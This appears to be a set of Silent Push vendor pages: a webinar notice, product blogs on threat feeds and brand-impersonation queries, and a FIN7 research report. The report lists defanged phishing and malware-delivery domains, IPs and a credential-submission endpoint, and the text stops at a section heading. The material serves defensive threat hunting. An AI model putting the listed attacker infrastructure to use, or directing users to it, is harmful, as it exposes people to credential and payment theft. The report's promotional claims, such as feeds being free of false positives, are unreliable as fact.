Banner for FIN7 webinar

Webinar: Hunting for FIN7 phishing and malware infrastructure

Details

  • Date: Wednesday July 31, 2024, 12pm PST – now on-demand
  • Level: Intermediate
  • Duration: 40 mins (35 mins + 5 mins Q&A)

Background

FIN7 (also known as Sangria Tempest, ATK32, Carbon Spider, Coreid, ELBRUS, G0008, G0046, and GOLD NIAGARA) are a financially-motivated threat group with links to Russia that has been operating since at least 2013, who were previously thought to have been eliminated by the DOJ following a series of high-profile federal convictions.

FIN7 primarily targets US-based retail, hospitality, tech, consulting, financial services, medical equipment, media, transportation, and utilities industries.

For more information, read our recent FIN7 research report.

Structure

In the webinar, our team will provide a detailed overview of how – from a single origin point – they executed a variety of platform queries, scans and lookups to uncover 4000+ FIN7 Indicators of Future Attack (IOFAs), and built a traceable behavioral fingerprint of attacker activity by using FIN7’s own TTPs against them.

Active infrastructure discovered includes phishingspoofingshell and malware delivery domains and IPs targeting a broad range of big name brands.

The webinar will cover the following topics:

  1. Organizations and sectors targeted
  2. Legacy FIN7 attack vectors
  3. New FIN7 attack vectors
  4. Overlap with other threat actors
  5. Current FIN7 infrastructure
  6. FIN7 threat hunting summary
  7. Mitigation and prevention

Following the presentation, there will be a 5 minute Q&A session for attendees to gather intelligence specific to their organization.

Registration

Due to operational security reasons, we manually approve each individual who requests access to view this webinar. This means you may have to wait up to 24 hours to receive your personal login code. Thank you for your understanding!

IOFA Feeds

Silent Push Threat Feeds: IOFA Feeds, Bulk Data Feeds and Custom Feeds

Threat feeds provide security teams with an transferable list of domains, IPs and URLs, that can be used to automatically counteract cyber threats, and improve an organization’s situational understanding of an evolving threat landscape.

Think of threat feeds as a live weather reporting system, offering up new information that can help you prepare for a storm that is coming your way, or alerting you to one that is already circling overhead.

Feeds are typically created via open source intelligence streams (often referred to as OSINT), internally by security teams using targeted intelligence, or packaged and sold to organizations by threat intelligence vendors.

Summary

This blog explains the problems faced by security teams when using feed data to detect and counteract threats, before outlining the various feed types on offer as part of a Silent Push Enterprise subscription, and how to use the data to produce actionable intelligence.

To help you understand how we collect and correlate threat data, take a quick look at our blogs on data independence and data enrichment.

Common threat feed problems

Threat feeds are the bread and butter of most security operations, but they come with a series of operational hurdles that need to be overcome before they can be relied upon as accurate and timely sources of intelligence.

1. Inaccurate information

Feed data sometimes suffers from a lack of real-time updates, incorrect information or false positives provided by unknown contributors, that creates noise and consumes resource to convert into actionable intelligence.

This is particularly true of open source intelligence (OSINT) feed data.

2. A record of what HAS happened

Threat feeds that are solely populated with post-breach data are often over valued, and aren’t equipped to provide organizations with a reliable account of pre-weaponized infrastructure.

Just like the punch that a boxer doesn’t see coming, an unknown cyber attack has the potential to cause significantly more damage to an organization than an attack vector that’s already been identified in the wild, and is therefore easier to counteract.

3. Data overload and alert fatigue

Quality of data is king.

It’s possible to have too much threat data, too much context and too many domains and IPs to sift through, using a finite set of analyst resources that’s often stretched across multiple security workflows.

The most effective threat feeds are populated with timely, accurate and reliable indicators that cut through the noise and provide immediately actionable intelligence, without the need for endless pivots to confirm a set of true positives.

Data Independence

Data Independence is the concept of a threat intelligence provider collecting and owning 100% of the data that it delivers to is customers.

Silent Push is wholly data independent, meaning that we are able to add an infinite amount of context to each observable data point contained within the platform.

We don’t rely on third-party collection methods, telco hardware or other security vendors. The DNS and content data that we deliver to our customers is collected, aggregated and scored by us, and us alone, using a proprietary scanning and aggregation engine, and our own query language – SPQL.

We create self-contained searchable spaces across the IPv4, IPv6 and dark web spaces that reduces time to discovery, increases query and scanning flexibility, and doesn’t rely on poorly aggregated OSINT data that isn’t designed to work in harmony with a given UI or API surface.

Silent Push feed types

If you want to make sure that your threat feeds are effective in detecting and protecting against cyber threats, then it’s essential for your security teams to diversify their data sources to improve detection capabilities, and ensure quality of data to be able to preemptively detect attacks before they cause damage.

At Silent Push, we provide this functionality via the console and API, using three feed types:

  • IOFA Feeds: Domain, IP and URL Indicators of Future Attack.
  • Bulk Data Feeds: Changes and additions across the global IPv4/6 range.
  • Custom Feeds: User created feeds populated with organization-specific threat data.

Here’s a run-down of each feed type…

1. Indicator of Future Attack (IOFA) threat feeds

Traditional IOC feeds are legacy intelligence sources that serve to inform security teams of where an attack has been, rather than where it’s coming from.

Indicators of Future Attack (IOFAs) act as preemptive indications of attacker behavior (domain, IP and URL data) and intent​, including pre-weaponized infrastructure.

FIN7 threat feeds

IOFA feeds are created and maintained by our team of Threat Analysts, meaning they are free of false positives, and only include relevant indicators gathered from research into threat actors, threat campaigns and attack vectors.

The majority of our IOFA feeds are linked to a TLP Amber report: finished intelligence reports containing sequential information on how we conducted our research, the queries, pivots and scans we used, and sensitive data points that we aren’t able to disclose publicly for OPSEC reasons.

Accessing IOFA Feeds

  1. Navigate to Data Marketplace → IOFA Feeds
  2. Use the menu bar at the top of the screen to search for an existing feed, filter feeds by type or sort them by newest or oldest
  3. Select View on a feed card to drill down into the data using the Feed Analytics screen
Accessing IOFA Feeds & Feed Analytics

2. Bulk Data Feeds

Bulk Data Feeds are slightly different to named threat feeds.

Rather than focusing on a specific threat or attack vector, they contain information on important DNS changes and additions across the global IPv4/6 range, that organizations can use to inform their cyber defense operations.

For example, if your organization is being targeted by a threat actor using a specific apex domain string, followed by the same country code top level domain (ccTLD), you can track any additions to that specific ccTLD DNS space, and react accordingly.

Bulk Data Feeds are available for the following DNS data types:

FEED NAMEDESCRIPTION
Newly Registered DomainsA list of new domains, collected from daily ICANN zone file updates
New ccTLD DomainsNew domains hosted on country code top level domains (ccTLDS), first seen within the last 24 hours
New Mail ServersNew mail servers, seen within the last 24 hours
New Name ServersA list of new name servers, first seen within the last 24 hours
New Self-Named Name ServersA list of new self-named name servers, first seen within the last 24 hours
All Name Server ChangesA list of domains that have changed name servers within the last 24 hours
Name Server Changes to a Self-Named Name ServerDomains that have changed to a self-named name server within the last 24 hours
IPv4s from Least Reputable SubnetsIPv4 addresses collected from the top 100 subnets with the worst Silent Push subnet reputation scores, within the last 24 hours
IPv4s from Least Reputable ASNsIPv4 addresses collected from the top 100 ASNs with the worst Silent Push ASN Takedown scores, within the last 24 hours
IPFS Nodes IPv4IPv4 addresses that have acted as IPFS nodes within the last 7 days
IPFS Nodes IPv6IPv6 addresses that have acted as IPFS nodes within the last 7 days

Accessing Bulk Data Feeds

Enterprise users can access Bulk Data Feeds by navigating to Data Marketplace → Bulk Data Feeds.

Use the menu bar to search for an existing feed, filter feeds by type or sort them by newest or oldest:

Accessing Bulk Data Feeds

You can export all the data contained in a Bulk Data Feed as a .txt file by clicking the Download File or Automate Export buttons.

3. Custom threat feeds

Enterprise users are able to create Custom Feeds from organization-specific IOFAs, in three ways:

  1. From a file (supported filetypes are CSV, JSON, TXT, STIX)
  2. From a URL
  3. Starting from scratch with an empty feed

Feeds created from a file can be assigned a vendor name, if applicable, along with a source score that assigns a risk level to the data contained within it.

Creating a new threat feed

Adding data to an existing threat feed

New IOFAs can be added to a Custom Feed from various parts of the platform, including:

  1. IPv4 Enrichment
  2. PADNS Lookup
  3. Live Scan

For each of the above options, navigate to the top right of the screen where you will find the Save To button. Select it, and add the indicator to a new or existing feed.

Managing and analyzing feeds

The Threat Intelligence Management menu is designed to allow users to access and manage feeds from one central console.

Viewing a list of feeds in one place

From the Threat Intelligence Management → Feeds menu you’re able to view:

  • All Feeds: All feeds that you have access to
  • Global Feeds: All feeds accessible to Silent Push Enterprise users
  • Organization Feeds: Proprietary feeds related to your organization
  • My Feeds: Lists all Custom Feeds created by the user

Viewing threat feed data

To display feed data in Threat Ranking, click the Show on Threat Ranking button.

The Threat Ranking screen contains a list of all feed data that you’ve chosen to display, including enriched data for the displayed domain, or IP address, and risk scores.

Reporting on threat feeds

Understanding the quality and value of your feeds, is important in ensuring you’re making the most out of your intelligence gathering operation.

Navigate to Threat Intelligence Management → Feeds Reports to execute a side-by-side analysis of two or more feeds, including the following categories:

  • Frequency (hours): The interval between updates to the feed.
  • Accuracy: Based on user feedback regarding the number of false positives contained within the feed.
  • False Positive Ratio: The ratio of the number of false positives, in the last 30 days.
  • Overlap: The percentage of the feed’s observables that are seen within other feeds/collections.
  • Originator: The percentage of firstly reported observables, since the feed/collection was added.

To compare feeds side-by-side, select the check box located on the left of the feed name and click the Compare button, on the top right.

Actioning Silent Push threat feed data

You can use feed data to perform a number of actions, that provide additional context, and convert IOFAs into additional intelligence streams that can be shared among team members.

Pivot on feed data

Feed data can be accessed and expanded in Threat Intelligence Management → Threat Ranking screen.

Left click on a feed name in Feeds, and the data will be displayed on the Threat Ranking screen.

From here, you can expand any indicator by clicking the dropdown arrow to the left of the indicator, and view enriched data across numerous categories, including all associated risk scores, and perform three key pivots:

  1. Live Scan: Extract realtime data from a single URL (public or .onion), including a live screenshot
  2. Enrich: Deep dive into the indicator and view 90+ enrichment categories
  3. Lookup PADNS: Map out associated DNS infrastructure

Exporting feed data

Feed data can be exported and ingested in several ways, depending on your use case:

Downloaded as file

Downloading feed data via the Manual Export button allows you to export feed data as a CSV, JSON, TXT, RPZ or STIX file, for offline analysis or upload into another security product.

Left-click your chosen feed in the Feeds screen, select Download File, and choose your export format.

Downloaded via API URL

You can download feed data via a static API URL.

Select Automate Export, choose your required file type and click the Copy API Endpoint button. This endpoint retrieves a time-limited (3 hours) URL, that you can use to access the data.

Fed into a security stack

Feed data can also be externally fed into your security stack via Python, curl, and PHP.

Click the Automate Export button, and select the cURL, Python or pHp tabs to copy code samples and call it from your desired security tool.

Request a demo

Ready to take a step further and enhance your security operations with preemptive threat intelligence? Request a demo, and get complete access to Silent Push feed data, including all the functionality mentioned in this blog.

You can also access data enrichment and risk scoring by signing up for a Silent Push Community Edition account – a free threat hunting and cyber defense platform that features a range of queries and lookups, including Silent Push Web Scanner and Live Scan.

Man wearing hood that obscures his face, sitting on a laptop and holding a fishing rod

Brand Impersonation defense with Silent Push Community and Enterprise: how to combat domain, favicon, MX record and HTML title spoofing.

In cybersecurity terms, Brand Impersonation encompasses a variety of attacks vectors aimed at deceiving users into believing a fraudulent digital asset (usually web content, or an email) is legitimate and trustworthy.

In a typical scenario, a threat actor deploys infrastructure that spoofs a well-known brand’s website, or sends a “branded” email, with the aim of phishing for sensitive information, such as login details or payment card information, or delivering malware via an executable download.

Brand Impersonation page spoofing Meta
Brand Impersonation login portal spoofing (Meta)
Brand Impersonation email spoofing Quickbooks
Brand Impersonation email spoofing Quickbooks

Brand Impersonation isn’t limited to on-page content or one-off emails. Threat actors also spoof individual elements of a website, such as favicons and HTML titles that appear in a browser tab, in an effort to appear legitimate to the untrained eye.

The development of commercially available AI has seen the introduction of new attacker TTPs, such as ‘deepfake’ impersonation, automated reconnaissance of digital brand assets, and dynamic machine learning adaptations to phishing messages that drastically improves spelling and grammar – previously a reliable indication of fraudulent content.

Summary

In this blog, you’ll learn how to execute four powerful Brand Impersonation queries that locate malicious Indicator of Future Attack (IOFA) infrastructure, targeting four distinct areas of your online presence:

  1. Domains
  2. Favicons
  3. Emails
  4. HTML titles

New to Silent Push? Download our free Community Edition here and follow along as we guide you through each query.

Silent Push Brand Impersonation menu
Silent Push Brand Impersonation menu

Each query generates an IOFA results set that allows security teams to track and monitor the underlying infrastructure associated with Brand Impersonation attacks, and prevent further attacks by locating additional infrastructure at source, rather than relying on post-attack intelligence.

Defenders are able to use Silent Push Brand Impersonation IOFAs to construct threat feeds dedicated to multiple apex domains or supply chain domains, ingest data into a security stack via the Silent Push API, and use enriched threat intelligence to automate their pre-breach security posture and IR processes.

Let’s take a look at each query in turn….

1. Domain Brand Impersonation query

The Silent Push Domain Impersonation query is designed to identify ‘typosquatting’ – a TTP that involves a threat actor registering a domain name that’s similar to a well-known brand, and either mispelling it or otherwise obfuscating using a combination of a subdomain and country code top level domain (ccTLD), in an attempt to capture traffic meant for a legitimate website.

From the main Domain Impersonation query screen, you can input a domain or regex – a form of advanced search that looks for specific naming patterns, instead of using whole domain names – and search for impersonating domains with one click.

To narrow the search, the query features an Auto-fill Data button that automatically excludes results hosted on trusted infrastructure (the IP, subnet, nameserver and ASN associated with your legitimate domain). You can also manually include or exclude certain infrastructure.

You can use the First Seen and Last Seen sliders to focus on recent impersonation attempts, or execute a historical interval-based search using Silent Push’s passive DNS records.

Working with Domain Impersonation results

Domain Impersonation results are generated on an Explore screen – the standard output screen for DNS data across Silent Push Enterprise and Community Editions – alongside their associated risk score.

From the Explore screen, you can perform further forward and reverse DNS pivots on any domain or IP address returned, you can enrich any ASN you discover to explore malicious clusters of domains and IPs, and as with any dataset on the Explore screen you can save all or a section of the results to a new or existing feed.

2. Email Brand Impersonation query

Our Email Impersonation feature locates domains that are being used to target organizations through MX record manipulation.

MX (Mail Exchange) records are DNS instructions that dictate which mail server is responsible for receiving emails for a specific domain.

By manipulating these records, attackers can make it appear as though their emails are coming from a legitimate sender’s mail server, despite originating from a malicious source.

The Email Impersonation query returns both mail records and their associated domains that are potentially involved in impersonation attacks against your own infrastructure.

Working with Email Impersonation results

Data is returned across the following categories, along with associated risk scores:

  • Query contains the potentially suspect domain
  • Answer is the MX record that the domain is pointing to
  • MX Hash is a hash value associated with the MX record listed in the Answer column
  • WHOIS Created is a timestamp of when the domain in the Query column (and its subdomains) was created
  • MX Server Density is the number of domains using the returned mailserver

Results are populated on an Explore screen. You can click any string of blue text to perform additional forward and reverse DNS pivots on domains and MX records, or enrich a piece of data by viewing granular information across 100+ constituent categories.

3. Favicon Brand Impersonation query

Favicons are small images (usually 16×16 pixels), unique to each brand, that appear in browser tabs, address bars, bookmarks and search engine results.

Replicating a brand’s favicon and linking it to a spoofed website is a relatively straightforward task, and threat actors use them to make phishing infrastructure appear legitimate in the eyes of the user, increasing the believability of their scam.

The Silent Push Favicon Impersonation query captures favicon data associated with a trusted domain, and hunts for non-trusted malicious infrastructure using the same favicon image.

Simply enter a domain, and click Search to locate spoofed infrastructure.

Working with Favicon Brand Impersonation results

Favicon Impersonation queries are executed on the back-end using Silent Push Web Scanner.

When a Favicon Impersonation query is run, the platform automates a Web Scanner query that captures the MD5 hash of a domain’s legitimate favicon, and automatically scans for its use across all public-facing non-trusted infrastructure.

Unlike Domain Impersonation and Email Impersonation queries, Favicon Impersonation results are populated using a Web Scanner table, with the following default categories:

  • scan_date – Timestamp of when the data was scanned
  • origin_url – URL that was originally scanned
  • URL – The final destination URL
  • hostname – Domain
  • favicon_icons – Image displaying the favicon retutned for that result
  • favicon_murmur3 – Murmur3 hash (standard favicon)
  • favicon2_murmur3 – Murmur3 hash (favicon2)

Web Scanner is powered by SPQL, a free-form query language used to explore all the DNS data and content gathered by our daily scans of the Internet’s IPv4/6 range, and the dark web. SPQL utilizes 100+ data categories, including SSL data, redirects, HTML header data, and body hash values.

Data categories can be added or removed from the Favicon Impersonation results table depending on how much you’d like to know about a returned domain. Simply click the icon next to Basic Raw Data, and select or deselect categories from the list.

To get a comprehensive breakdown of each result, including all relevant SPQL field names associated with the result, click Expand on the far right of the results table.

As with the Explore table used to provide Domain Impersonation and Email Impersonation results, you can pivot on any string of blue text to perform a variety of additional functions and gather more intelligence, including:

  • Add a result to a new Web Scanner query
  • Perform a Live Scan of a URL
  • Add a domain or IP address to a feed
  • Enrich a piece of data, or perform a passive DNS lookup

HTML Title Brand Impersonation query

A HTML title is the text string that appears in your browser tab, or a website’s title bar.

As with favicon spoofing, threat actors use HTML titles to make their impersonation infrastructure appear legitimate.

Fake websites masquerading as a well-known brand will often feature what appears to be a legitimate HTML title in their website code, so that casual visitors are fooled into thinking the domain is safe and secure.

To run a query, simply enter a trusted domain and hit Search.

Working with HTML Title Impersonation results

Just like a Favicon Impersonation queries, HTML Title queries use Web Scanner to capture the legitimate domain’s HTML title, and run a query that locates non-trusted domains using the same HTML title.

Results are populated across the following default columns:

  • htmltitle – HTML title of the returned result
  • scan_date – Timestamp of when the data was scanned
  • origin_url – URL that was originally scanned
  • URL – The final URL that’s arrived at
  • IP – IP address
  • hostname – Domain

As with Favicon Impersonation data, the results table can be adjusted according to what you need to know.

You can add data categories that provide more content to each malicious domain returned, expand on each result to get a comprehensive breakdown of a domain’s constituent parts, or pivot across infrastructure using Enrichment and passive DNS lookups.

Monitoring queries

Silent Push allows you to setup Brand Impersonation Monitors that alert you to changes in a given dataset via email, every 24 hours.

To create a Monitor:

  1. Select the Monitor button on the top right of the results screen.
  2. Enter a Monitor Name and a Description.
  3. Click Save.

Monitors can be accessed, edited and deactivated by navigating to Monitors > Monitored Queries.

You can also save your queries for quick access at a later date, or share them across your organization with other team members.

Register for Silent Push Community Edition

You can access all the Brand Impersonation features detailed in this blog using Silent Push Community Edition – a free threat hunting and cyber defense platform used by security teams, researchers and threat hunters across the globe, in a variety of sectors.

Community Edition also features access to Silent Push Web Scanner and Live Scan, along with a variety of powerful DNS lookups, and offensive/defensive tooling.

Sign-up free here.

Painting of the Mona Lisa wearing a Ushanka hat hung up on a dirty wall

FIN7: Silent Push unearths the largest group of FIN7 domains ever discovered. 4000+ IOFA domains and IPs found. Louvre, Meta, and Reuters targeted in massive global phishing and malware campaigns.

Key findings

  • FIN7-related attacks resurface, a year after DOJ claimed victory
  • 4000+ FIN7 shell/phishing domains and subdomains discovered, with nearly half active in the last week
  • Prominent global brands targeted, including Reuters, Meta and Microsoft
  • “Requires Browser Extension” malware re-appears in the wild

Executive Summary

FIN7 (also known as Sangria Tempest, ATK32, Carbon Spider, Coreid, ELBRUS, G0008, G0046, and GOLD NIAGARA) are a financially-motivated threat group with links to Russia, that has been operating since at least 2013, who were previously thought to have been eliminated by the DOJ.

FIN7 primarily targets US-based retail, hospitality, tech, consulting, financial services, medical equipment, media, transportation, and utilities industries using:

  • T1566 – Spearphishing (for credentials and credit card information)
  • T1486 – Data Encrypted for Impact (Ransomware)
  • T1176 – Malicious Browser Extensions
  • T1056.003 – Web Portal Capture
  • T1189 – Drive-by Compromise
  • T1665 – Hide Infrastructure
  • T1583.008 – Malvertising

Our research proves the group has either resurfaced, or threat actors are repurposing FIN7 TTPs and infrastructure to propagate a fresh set of campaigns utilizing over 4000 domains and subdomains, with nearly half active in the last week.

From a single origin point, Silent Push Threat Analysts have uncovered an extensive series of FIN7 campaigns, including several hundred active phishing, spoofing, shell and malware delivery domains and IPs targeting the following organizations: Louvre Museum, Meta, Reuters (and WestLaw), Microsoft 365, Wall Street Journal, Midjourney, CNN, Quickbooks, Alliant, Grammarly, Airtable, Webex, Lexis Nexis, Bloomberg, Quicken, Cisco (Webex), Zoom, Investing[.]com, SAP Concur, Google, Android Developer, Asana, Workable, SAP (Ariba), Microsoft (Sharepoint), RedFin, Manulife Insurance, Regions Bank Onepass, American Express, Twitter, Costco, DropBox, Netflix, Paycor, Harvard, Affinity Energy, RuPay, Goto[.]com, Bitwarden, and Trezor.

Software being targeted includes 7-zip, PuTTY, ProtectedPDFViewer, AIMP, Notepad++, Advanced IP Scanner, AnyDesk, pgAdmin, AutoDesk, Bitwarden, Rest Proxy, Python, Sublime Text, and Node.js

Silent Push Threat Analysts have also identified an active cybersecurity shell company – cybercloudsec[.]com – which is being used to facilitate FIN7 activity, in line with previous attack vectors.

Silent Push Enterprise users have access to a dedicated TLP Amber report, containing the specific data categories, content scans and advanced DNS queries we used as well as four dedicated FIN7 IOFA Feeds.

Background

FIN7 are sometimes associated with the Carbanak threat group (as distinct from the Carbanak malware – a backdoor attack vector FIN7 have been known to use), however both are tracked differently.

Numerous researchers and threat intelligence teams have attributed FIN7 activity to Russia-linked threat actors. Prominent members of the group have been convicted in Russian courts, or have strong ties to the region.

In April 2021, Acting U.S. Attorney Gorman May 2023 said: “This criminal organization had more than 70 people organized into business units and teams. Some were hackers, others developed the malware installed on computers, and still others crafted the malicious emails that duped victims into infecting their company systems”.

In May 2023, U.S. Attorney Nick Brown announced that FIN7 “as an entity is no more“, after three prominent members of the group were convicted in a federal court for Conspiracy to Commit Wire Fraud and Conspiracy to Commit Computer Hacking.

Less than a month later, Microsoft Threat Intelligence (tracking the group as “Sangria Tempest”) observed the group using OpenSSH and Impacket to move laterally and deploy Clop ransomware.

Microsoft FIN7 tweet

Our Analysts have discovered legacy FIN7 domains, malware and TTPs in the wild, including spearphishing attack vectors that are listed in the federal indictment.

Additional information

This blog contains a public overview of how we identified and traversed FIN7 infrastructure. Certain key data types and threat hunting techniques have been omitted, for operational security reasons.

Enterprise customers have access to all related intelligence in the aforementioned TLP Amber report.

Initial discovery

A few weeks ago, we discovered a suspect domain that our Analysts recognized as bearing all the hallmarks of a FIN7 domain.

After confirming our findings by corroborating the domain with well-publicized FIN7 TTPs, we used the Silent Push platform to construct granular queries that first identified linked domains across common hosts.

We then confirmed true positive phishing and malware infrastructure using sandboxed browser testing and executable analysis.

Corporate fronts used for FIN7 spearphishing

FIN7 infrastructure is known to contain corporate “shell” domains masquerading as legitimate businesses online, to deploy spearphishing campaigns that inject ransomware and other forms of malware.

Previous attacks have involved FIN7 initiating contact with potential victims, before using shell domains to operate under the guise of legitimacy, when propagating attacks.

Our dedicated feeds contain over 4000 shell domains and subdomains, which is a conglomeration of everything we’ve discovered, including hundreds of websites propagating spear-phishing activity across a broad variety of industries and sectors.

Here’s a few examples, including one targeting Quickbooks:

FIN7 spear phishing email
Shell website (Waterstones)
Shell website (Econocore)

Fake cybersecurity company (cybercloudsec[.]com)

In 2021, three members of FIN7 were sentenced to between 5-10 years each in a federal prison for their role in a multi-million dollar hacking conspiracy.

The indictment describes the use of a fake cybersecurity company – Combi Security – as a front to recruit other threat actors, and provide an air of legitimacy to an operation that involved uploading malware onto POS terminals, credit card fraud, spearphishing, and spoofing.

Old habits do indeed die hard. Whilst hunting for domains across Stark Industries infrastructure in our dedicated FIN7 IOFA feed that mentioned “cyber”, “secure”, or “security”, we came across cybercloudsec[.]com and that bears all the hallmarks of a FIN7 shell domain.

cybercloudsec[.]com appears to have began its life in 2011 as a legitimate business domain, registered out of Virginia:

Original Twitter profile for cybercloudsec[.]com
Twitter profile for the original cybercloudsec[.]com

Nowadays it’s hosting a site that is being operated using legacy FIN7 TTPs:

FIN7 landing page for fake cybersecurity company
Landing page for cybercloudsec[.]com

At this stage, we’re unsure as to the domain’s specific role in the attack chain, but due to a set of common characteristics, we can safely assume that it’s operating in much the same way as the aforementioned Combi Security, which played a prominent role in the 2021 federal indictment.

FIN7 shell domains morphing into phishing websites

A common FIN7 TTP is to take what were formerly shell domains, and morph them into conventional spoofing websites (via redirects or on-page content) targeting users of well-known brands with phishing and malware delivery.

From our analysis, content is served based on a range of user-specific parameters. Domains may or may not populate based on geographic region, IP address, local time, type of connection and browser settings (e.g. JavaScript being enabled).

Morphed domain (Alliant)

escueladeletrados[.]com was accessed on June 9, 2024 via a browser session behind a VPN.

At one point in its life, the domain presented as a shell website, however when accessed live with a different set of user parameters, it returned a phishing page targeting Alliant Credit Union.

Here are the two different versions of the same domain:

Morphed domain targeting Alliant
escueladeletrados[.]com as an Alliant phishing page on 9 June
Shell domain
escueladeletrados[.]com as a shell domain on 9 June

Morphed domain (Meta)

FIN7 infrastructure actively targets large tech brands in an attempt to capture login traffic meant for legitimate online portals.

In one example, miidjourney[.]net changed from a fake corporate fashion website, to a Meta phishing page relatively quickly.

FIN7 Meta phishing page
Meta phishing page @ miidjourney[.]net

Unfortunately, we weren’t able to archive the original content on this site before it changed to the Meta phishing page, however, Google cached the previous page pages—as you can see, this was at one point a shell website with random content:

Proof of domain morphing

The link shortener URL attached to the action button sends visitors to: ln[.]run/supportcenterbusiness. We were unable to trigger the next stage of the phishing campaign.

We conducted further content similarity scans that unearthed three more multi-stage Meta phishing domains:

  • go-ia[.]info redirecting to accountverify.business-helpcase718372649[.]click/ 
  • go-ia[.]site redirecting to themetasupporrtbusiness.nexuslink[.]click/ 
  • go-ia[.]site domain triggers payloads on themetasupporrtbusiness.nexuslink[.]click/.

The page progression is captured below:

FIN7 Meta phishing page - first stage payload
First stage payload on themetasupporrtbusiness.nexuslink[.]click
FIN7 Meta phishing page - second stage payload
Second stage payload

We conducted a test with a temporary SMS number, but didn’t receive any additional details. It appears that once a user inputs a phone number, email and birthday, a series of password prompt screens appear asking them to verify their Facebook password:

FIN7 Meta phishing page - screen 1
Password prompt screen 1
FIN7 Meta phishing page - screen 2
Password prompt screen 2

The login submission POST request sends via “kun-quang-api.lordofscan[.]pro/LoginProcess/api/login_submit”. Only marginal intel is available about this domain. We’ve only captured one live page from it in 2023, with the HTML title, “Log in – DomainManagement”. Other than that, it’s hosted on Cloudflare and registered in Vietnam via GMO INTERNET, INC.

Grouped FIN7 domains (Iranian bank)

Morphed shell domains aren’t limited to an isolated URL. Quite often, domains will be grouped together with similar apex domains and different TLDs, targeting the same set of users.

Here’s a group of such domains targeting users of Bank Mellat – a national bank in Iran. As you can see, none of these domains are typosquatting the actual domain – bankmellat[.]ir.

  • treidingviw-web[.]xyz
  • treidingviw-web[.]shop
  • treidingviw-web[.]lol
  • tredildlngviw[.]xyz
  • tredildlngviw[.]shop
FIN7 phishing page targeting Iranian bank

Shell domain phishing redirect (RMS Cloud)

Another observed tactic is that shell domains are occasionally used in a conventional redirect chain to send users to spoofed login pages.

For example, the former shell domain www.tivi2[.]com redirects on visit to app.rmscloud[.]pro/login/, which is itself a phishing page targeting the legitimate property management portal rmscloud[.]com.

RMS Cloud portal phishing page
RMS Cloud portal phishing page @ www.tivi2[.]com

Quite often these redirected domains feature an accessible open directory. Here’s an example from womansvitamin[.]com containing Anydesk.exe files.

Our team tested the contents and discovered that, as of the time of this report, these are legitimate versions of the Anydesk application. However, it is possible they may be replaced in the future with malicious versions.

Open directory on womansvitamin[.]com
Open directory on womansvitamin[.]com

Miscellaneous phishing

Sometimes, a conventional brand impersonation/typosquat redirect is deployed, to capture traffic meant for legitimate businesses, where the initial URL is spelt similarly to the destination phishing page.

In this example targeting users of the popular WordPress plugin WP Engine, www.wpenglneweb[.]com redirects to a phishing domain at identity-wpengine[.]com/session_id/login/

FIN7 WP Engine phishing page
FIN7 WP Engine phishing page @ identity-wpengine[.]com/session_id/login/

Here’s another example targeting DCU[.]org (Digital Federal Credit Union) – ddcccuuu[.]online:

Louvre Museum payment scraping

Here’s another example targeting visitors to the Louvre Museum in the run-up to the 2024 Paris Olympics. louvre-event[.]com redirects to the phishing page book.louvre-ticketing[.]com:

FIN7 Louvre Museum phishing page
louvrebill[.]click redirecting to book.louvre-ticketing[.]com

In another TTP, paris-journey[.]com redirects to louvrebil[.]click, which redirects users to paybx[.]world to “collect payment” for tickets.

Here’s a video outlining the redirect process:

Crypto wallet phishing

Our analysts were able to find an unfinished FIN7 domain – emeraldblockestates[.]com – being used to develop what appears to be a new phishing module, built for targeting numerous crypto companies.

Here’s a video demonstrating the attack chain:

Brands targeted include Coinbase, Metamask, Rainbow Crypto Wallet, Ronin Wallet, OKX Wallet, Trust Wallet, Exodus, Phantom, and WalletConnect.

Rented FIN7 infrastructure (Stark Industries)

FIN7 rents a large amount of dedicated IPs on a number of hosts, but primarily on Stark Industries, historically considered a bulletproof hosting provider, “dedicated IPs” here meaning those IP ranges with verified FIN7 domains and less than 200 subdomains/domains mapped to a given IP.

Our threat analysts have discovered numerous Stark Industries IPs that are solely dedicated to hosting FIN7 infrastructure.

Here’s a Silent Push Explore DNS query we ran on one such domain – 103.35.191[.]28. All of the domains hosted on this IP share the common string “meet-go”, and are verified FIN7 domains with different TLDs.

Stark Industries FIN7 infrastructure on 103.35.191[.]28

Other dedicated hosts, not on Stark Industries, also feature a mix of FIN7 domains targeting more than one brand, across numerous industries.

89.105.198[.]190 on NOVOSERVE-AS, NL hosts multiple spoofing domains targeting brands such as like Airtable, Webex, Lexis Nexis, Bloomberg, and Quicken.

Stark Industries FIN7 infrastructure on 89.105.198[.]190

FIN7 malware infrastructure

Public research from organizations like Esentire, RedCanary, and Blackberry about FIN7 attack vectors includes a specific template the threat actor uses for distributing MSIX malware via Google ads and possibly other channels, describe MSIX installers linked to FIN7, and reference the FIN7 “powertrash” (a part of the MSIX payload) process each have seen.

Most of these web pages feature a pop-up with the phrase “Requires Browser Extension!”.

Here’s an example targeting Reuters News Agency on thomsonreuter[.]info (we’ve also discovered Reuters phishing infrastructure on thomsonreuter[.]pro and westlaw[.]top, targeting the Reuters Westlaw product):

FIN7 fake browser extension malware

In December of 2023, Microsoft also observed FIN7 using MSIX malware and a Windows Trojan, EugenLoader, to inject Carbanak – a piece of software that the group has used for a decade to deliver the Gracewire implant.

Our Analysts have discovered a pool of FIN7 domains which appear to be mostly used for delivering malware – these include the “Requires Browser Extension” page highlighted above.

Hunting for FIN7 malware infrastructure

To reveal additional infrastructure, we investigated an IP (103.113.70[.]142) that was seen to be hosting three malware delivery domains – concur[.]pm, concur[.]re, and concur[.]cfd – all involved in spoofing SAP Concur.

FIN7 malware infrastructure on 103.113.70[.]142

We then created a Silent Push Web Scanner query that identified matching content across Stark Industries hosts.

This scan uncovered a large amount of new FIN7 infrastructure, including several new page templates that are likely serving malware, based on user-specific and browser-specific geo/IP parameters, with most of the live domains we discovered featuring the aforementioned browser extension malware.

FIN7 malware infrastructure

August 13, 2024 Update: After publishing this Fin7 research, Silent Push collaborated with Team Cymru and Stark Industries to take down Fin7 infrastructure on their network and hunt for additional hosts. A write up of the collaboration can be found here.

Microsoft malware

We also discovered FIN7 infrastructure spoofing Microsoft Sharepoint. dr1ve[.]xyz features a “The file could not be opened” prompt, which leads to a download button.

We are yet to observe malware being delivered via this piece of infrastructure, but the potential is there for it to be deployed as an attack vector targeting other users operating with a different set of geo and browser parameters:

FIN7 fake SharePoint page

Using domain metadata and on-page content, we executed a Web Scanner query that revealed even more FIN7 spoofing infrastructure, including the linked domains driv7[.]com, and driv3[.]net, which are likely part of the same Sharepoint campaign as the above domain.

Developer malware

